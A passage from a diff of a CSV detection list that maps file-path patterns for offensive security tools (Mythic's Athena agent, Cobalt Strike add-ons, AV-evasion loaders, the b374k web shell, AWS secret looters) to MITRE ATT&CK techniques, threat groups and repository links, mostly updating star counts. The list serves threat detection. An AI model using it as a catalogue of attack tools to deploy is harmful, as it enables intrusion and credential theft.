protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/Athena-*.zip*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/Athena.csproj*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/Athena.exe*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/Athena.Profiles.*.cs*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/Athena.Profiles.*.exe*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/Athena.Profiles.*.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/Athena.sln*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/Athena/Assembly/*.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/Athena/Commands/*.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/athena/mythic*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/athena_utils/*.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/AthenaPlugins/bin/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/AthenaSMB/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/AthenaTests/*.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/AtlasReaper.git*","offensive_tool_keyword","AtlasReaper","A command-line tool for reconnaissance and targeted write operations on Confluence and Jira instances.","T1210.002 - T1078.003 - T1046 ","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://github.com/werdhaihai/AtlasReaper","1","1","N/A","3","3","203","21","2023-09-14T23:50:33Z","2023-06-24T00:18:41Z" "*/AtomLdr.git*","offensive_tool_keyword","AtomLdr","A DLL loader with advanced evasive features","T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002","TA0011 - TA0006 - TA0002 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/NUL0x4C/AtomLdr","1","1","N/A","N/A","6","543","78","2023-02-26T19:57:09Z","2023-02-26T17:59:26Z" "*/attackercan/*","offensive_tool_keyword","Github Username","github Penetration tester repo hosting malicious code","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0008 - TA0011","N/A","N/A","Exploitation tools","https://github.com/attackercan/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/attacks/*.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/attacks/*.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*/AttackServers/*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*/AttackSurfaceMapper.git*","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","1","N/A","6","10","1221","192","2023-09-11T05:26:53Z","2019-08-07T14:32:53Z" "*/Augustus.git*","offensive_tool_keyword","Augustus","Augustus is a Golang loader that execute shellcode utilizing the process hollowing technique with anti-sandbox and anti-analysis measures. The shellcode is encrypted with the Triple DES (3DES) encryption algorithm.","T1055.012 - T1027.002 - T1136.001 - T1562.001","TA0005 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/TunnelGRE/Augustus","1","1","N/A","6","2","107","23","2023-08-27T10:37:51Z","2023-08-21T15:08:40Z" "*/auth/cc2_auth.*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*/auth-owners.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/auth-spoof.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/autobloody.git*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","N/A","10","4","330","38","2023-09-01T06:41:34Z","2022-09-07T13:34:30Z" -"*/autobloody/archive*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","N/A","10","4","330","38","2023-09-01T06:41:34Z","2022-09-07T13:34:30Z" +"*/autobloody.git*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","N/A","10","4","330","38","2023-10-04T14:40:59Z","2022-09-07T13:34:30Z" +"*/autobloody/archive*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","N/A","10","4","330","38","2023-10-04T14:40:59Z","2022-09-07T13:34:30Z" "*/AutoBypass.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*/AutoSmuggle.git*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","9","2","141","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" +"*/AutoSmuggle.git*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","9","2","142","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" "*/autotimeliner*","offensive_tool_keyword","autotimeliner","Automagically extract forensic timeline from volatile memory dumps.","T1547 - T1057 - T1003","TA0005 - TA0008","N/A","N/A","Forensic Exploitation tools","https://github.com/andreafortuna/autotimeliner","1","1","N/A","N/A","2","119","23","2023-03-17T07:29:34Z","2018-11-12T16:13:32Z" -"*/auxiliary/scanner/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/auxiliary/scanner/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/avet.git*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" "*/avet_fabric.py*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*/avet_script_config.sh*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" "*/avoid_badchars.py*","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","1","N/A","N/A","3","265","26","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" -"*/avred.git*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","9","2","172","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" -"*/avred.py*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","9","2","172","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" -"*/avred.py*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*/avredweb.py *","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","9","2","172","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" +"*/avred.git*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" +"*/avred.py*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" +"*/avred.py*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*/avredweb.py *","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" "*/awesome-burp-extensions/*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*/awesome-pentest*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" -"*/aws__enum_account*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*/aws__enum_account/main.py*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/aws__enum_account*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/aws__enum_account/main.py*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" "*/AWS-Loot*","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tools","https://github.com/sebastian-mora/AWS-Loot","1","1","N/A","N/A","1","64","14","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z" "*/Azure-AccessPermissions.git*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","1","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*/AzureC2Relay*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","1","N/A","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" "*/AzureHound.ps1*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*/B374K*","offensive_tool_keyword","b374k","This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel. connecting using ssh. ftp etc. All actions take place within a web browser","T1021 - T1028 - T1071 - T1105 - T1135","TA0002 - TA0003 - TA0005","N/A","N/A","Web Attacks","https://github.com/b374k/b374k","1","0","N/A","N/A","10","2248","783","2023-07-06T20:23:03Z","2014-01-09T04:43:32Z" +"*/B374K*","offensive_tool_keyword","b374k","This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel. connecting using ssh. ftp etc. All actions take place within a web browser","T1021 - T1028 - T1071 - T1105 - T1135","TA0002 - TA0003 - TA0005","N/A","N/A","Web Attacks","https://github.com/b374k/b374k","1","0","N/A","N/A","10","2249","783","2023-07-06T20:23:03Z","2014-01-09T04:43:32Z" "*/BabelStrike.git*","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential 